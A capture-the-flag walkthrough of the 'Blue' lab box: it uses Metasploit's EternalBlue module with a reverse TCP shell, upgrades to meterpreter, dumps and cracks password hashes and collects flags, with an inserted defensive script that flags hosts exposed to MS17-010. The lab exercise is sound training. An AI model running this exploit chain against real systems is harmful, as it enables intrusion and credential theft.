By: Nicholas Werner
Starting off with an nmap scan.
We see that the OS is Windows 7 Professional 7601 Service Pack 1, so we search for an exploit and click on the Rapid7 link.
It appears that the exploit is EternalBlue, which makes sense given the name of the box (Blue).
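The scan-and-identify step above has a defender-side counterpart: triaging scan results for hosts that still expose SMB on a Windows build that MS17-010 covered. The script below is an added example, not part of the original walkthrough; the host records are constructed to resemble what one would extract from an nmap report (the OS string is the smb-os-discovery style seen in the write-up), and the addresses are placeholders.

```python
import re

# Constructed sample records (not real hosts): address, open TCP ports and the
# OS string as reported by nmap's SMB OS discovery. Parsing the nmap XML into
# this shape is assumed to have happened already.
SAMPLE_SCAN = [
    {"host": "10.10.10.40", "ports": [135, 139, 445, 49152],
     "os": "Windows 7 Professional 7601 Service Pack 1"},
    {"host": "10.10.10.41", "ports": [22, 80],
     "os": "Linux 4.15"},
    {"host": "10.10.10.42", "ports": [445, 3389],
     "os": "Windows Server 2008 R2 Standard 7601 Service Pack 1"},
    {"host": "10.10.10.43", "ports": [445],
     "os": "Windows 10 Pro 19045"},
]

# Kernel build numbers of the older Windows releases that MS17-010 patched:
# 6001/6002 Vista and Server 2008, 7600/7601 Windows 7 and Server 2008 R2,
# 9200 Windows 8 and Server 2012, 9600 Windows 8.1 and Server 2012 R2.
# Newer Windows builds were patched too, but only a patch-level check tells.
LEGACY_SMB1_BUILDS = {"6001", "6002", "7600", "7601", "9200", "9600"}
BUILD_RE = re.compile(r"\b(\d{4})\b")

MITIGATIONS = [
    "apply the MS17-010 update",
    "disable SMBv1",
    "restrict TCP/445 to trusted networks",
]


def assess_host(record):
    """Return a finding for one host, or None when MS17-010 cannot apply."""
    if 445 not in record["ports"] or "windows" not in record["os"].lower():
        return None  # SMB not reachable, or not a Windows host
    # findall, not search: "Server 2008 R2 ... 7601" carries two 4-digit tokens
    builds = set(BUILD_RE.findall(record["os"]))
    verdict = "likely exposed" if builds & LEGACY_SMB1_BUILDS else "verify patch level"
    return {"host": record["host"], "os": record["os"],
            "verdict": verdict, "actions": list(MITIGATIONS)}


def assess_scan(records):
    """Keep only the hosts that need attention, in scan order."""
    return [f for f in map(assess_host, records) if f is not None]


if __name__ == "__main__":
    for finding in assess_scan(SAMPLE_SCAN):
        print(finding["host"], finding["verdict"], "-", "; ".join(finding["actions"]))
```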
Copy and paste the module path from Rapid7 (use exploit/windows/smb/ms17_010_eternalblue). options shows us which options are required.
Set RHOSTS to the victim machine's IP address. Set the payload to windows/x64/shell/reverse_tcp.
exploit runs the module, and it looks like we got a shell.
We want a meterpreter shell, so we background this shell with Ctrl+Z.
search shell_to_meterpreter finds a module that upgrades our shell into a meterpreter shell.
We set SESSION to the number of our previous session and then run exploit.
sessions lists our sessions, and now we can see that a meterpreter session was opened. sessions -i 2 drops us into that meterpreter session.
getuid shows that we are running as SYSTEM, but that does not guarantee our current process is one we want to stay in.
ps lists the running processes with their process IDs.
We want to migrate into spoolsv.exe (migrate 1284).
hashdump allows us to see the hashes of the users on this machine.
Entering Jon's hash into CrackStation lets us crack it and see his password.
shell gives us a Windows command shell, which makes it easier to navigate the file system. cd c:\ takes us to the root of the C: drive.
dir lists the contents of the directory, and as we can see, flag1.txt is here, so type flag1.txt shows us its contents.
After some searching, we find the second flag in \Windows\System32\config.
Type cd .. until you get back to c:\.
We found the final flag in \Users\Jon\Documents.